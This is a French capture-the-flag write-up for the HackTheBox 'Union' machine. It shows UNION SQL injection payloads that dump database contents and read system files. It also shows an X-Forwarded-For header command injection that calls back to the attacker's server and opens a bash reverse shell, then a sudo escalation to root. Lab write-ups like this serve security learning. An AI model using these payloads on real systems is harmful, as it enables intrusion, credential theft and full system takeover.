Union HackTheBox (Writeup)

Skills:

SQLI (SQL Injection) - UNION Injection
SQLI - Read Files
HTTP Header Command Injection - X-FORWARDED-FOR [RCE]
Abusing sudoers privilege [Privilege Escalation]

Reconnaissance

Création de l'espace de travail :

Nous établirons notre espace de travail en créant trois dossiers pour stocker les contenus importants, les exploits et les résultats de la reconnaissance à l'aide de Nmap.

Vérification de la Connectivité VPN

Vérification de la connexion VPN pour assurer une communication stable avec la machine cible.

Recherche des ports ouverts avec Nmap :

Exploration des ports ouverts et exportation dans le fichier "allPorts" dans le répertoire Nmap:

nmap -p- --open -sS -n -Pn -vvv --min-rate 5000 10.10.11.128 -oG allPorts

Analyse des ports ouverts avec extractPorts:

Utilisation de la fonction extractPorts pour afficher de manière synthétique les ports ouverts et les copier dans le clipboard (80)

nmap -sCV -p80 10.10.11.128 -oN targeted

Port 80 - HTTP

Énumération de Fichiers

avec gobusteron va faire une enumeration de fichier avec extensions php

gobuster dir -u http://10.10.11.128 -w /usr/share/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt -t 200 -x php,txt

il y a deux fichiers qui ne sont pas accesible depuis l'exterrieurs (config.php et firewall.php)

Index.php si on ajoute un nom dans le formulaire il s'afiche a la reponse

le fichier challenge nous demande une flag

Vulnérabilité SQLI - UNION Injection

Nous interceptons la requête avec Burp Suite et altérons la variable player :

jordan' union select database()-- -

Le nom de la base de données est november.

Pour lister toutes les bases de données :

jordan' union select group_concat(schema_name) from information_schema.schemata-- -

Résultat : mysql,information_schema,performance_schema,sys, november

Lister les tables de november :

jordan' union select group_concat(table_name) from information_schema.tables where table_schema='november'-- -

Lister les colonnes de la table players :

jordan' union select group_concat(column_name) from information_schema.columns where table_schema='november' and table_name='players' -- -

Colonnes trouvées : player

Extraction des Données Utilisateur

jordan' union select group_concat(player,':') from players-- -

Players trouvées : ippsec,celesian,big0us,luska,tinyboy

Extraction du flag :

jordan' union select group_concat(column_name) from information_schema.columns where table_schema='november' and table_name='flag' -- -

jordan' union select group_concat(one,':') from flag-- -

Flag trouvé : UHC{F1rst_5tep_2_Qualify}

SQLI - Read Files

Lecture de /etc/passwd :

jordan' union select load_file('/etc/passwd');-- -

Nous trouvons un utilisateur uhc.

Flag user.txt

Lecture de user.txt :

jordan' union select load_file('/home/uhc/user.txt');-- -

Lecture de config.php, nous trouvons les identifiants de la base de données :

$servername = "127.0.0.1";
$username = "uhc";
$password = "uhc-11qual-global-pw";
$dbname = "november"

Lecture de firewall.php, nous comprenons que soumettre le flag ouvre le port SSH :



jordan' union select load_file('/var/www/html/firewall.php');-- -

Nous soumettons le flag : UHC{F1rst_5tep_2_Qualify}.

Le port 22 est maintenant ouvert.

Connexion SSH

Nous utilisons les identifiants trouvés pour nous connecter :

ssh [email protected]

uhc-11qual-global-pw

Élévation de privilège

HTTP Header Command Injection - X-FORWARDED-FOR [RCE]

Si on observe le fichier firewall.php, on remarque qu'il récupère l'en-tête HTTP_X_FORWARDED_FOR et l'utilise avec sudo pour exécuter une commande :

  if (isset($_SERVER['HTTP_X_FORWARDED_FOR'])) {
    $ip = $_SERVER['HTTP_X_FORWARDED_FOR'];
  } else {
    $ip = $_SERVER['REMOTE_ADDR'];
  };
  system("sudo /usr/sbin/iptables -A INPUT -s " . $ip . " -j ACCEPT");
?>

Étant donné que cette variable est contrôlable via une requête HTTP, nous pouvons injecter une commande arbitraire.

rxploitation

Comme il s'agit d'un en-tête HTTP, nous pouvons injecter une commande, par exemple en utilisant curl pour contacter notre serveur web.

Mise en place d'un serveur web :

python3 -m http.server 80

Commande d'injection avec curl :

curl -X GET -H 'X-FORWARDED-FOR: ;curl http://10.10.14.47/test;' --cookie "PHPSESSID=nc6hmrro5f449k38k2l6u4vcd3" 'http://10.10.11.128/firewall.php'

Reverse Shell

Écoute sur le port 443 :

nc -nlvp 443

Commande pour obtenir un shell distant :

curl -X GET -H 'X-FORWARDED-FOR: ;bash -c "bash -i >&/dev/tcp/10.10.14.47/443 0>&1";' --cookie "PHPSESSID=nc6hmrro5f449k38k2l6u4vcd3" 'http://10.10.11.128/firewall.php'

Une fois connecté, nous sommes l'utilisateur www-data.

Traitement Terminal

script /dev/null -c bash
#contrôle Z

stty raw -echo; fg
reset xterm
export TERM=xterm
export SHELL=bash
stty rows 44 columns 184

SUDO - (ALL:ALL)

Avec la commande suivante, nous vérifions les permissions sudo :

sudo -l

Si nous voyons que www-data peut exécuter n'importe quelle commande en tant que n'importe quel utilisateur ((ALL : ALL) ALL), nous pouvons alors exécuter un shell root avec :

sudo /bin/bash -p

Flag root.txt :)

Mis à jour il y a 10 mois

Ce contenu vous a-t-il été utile ?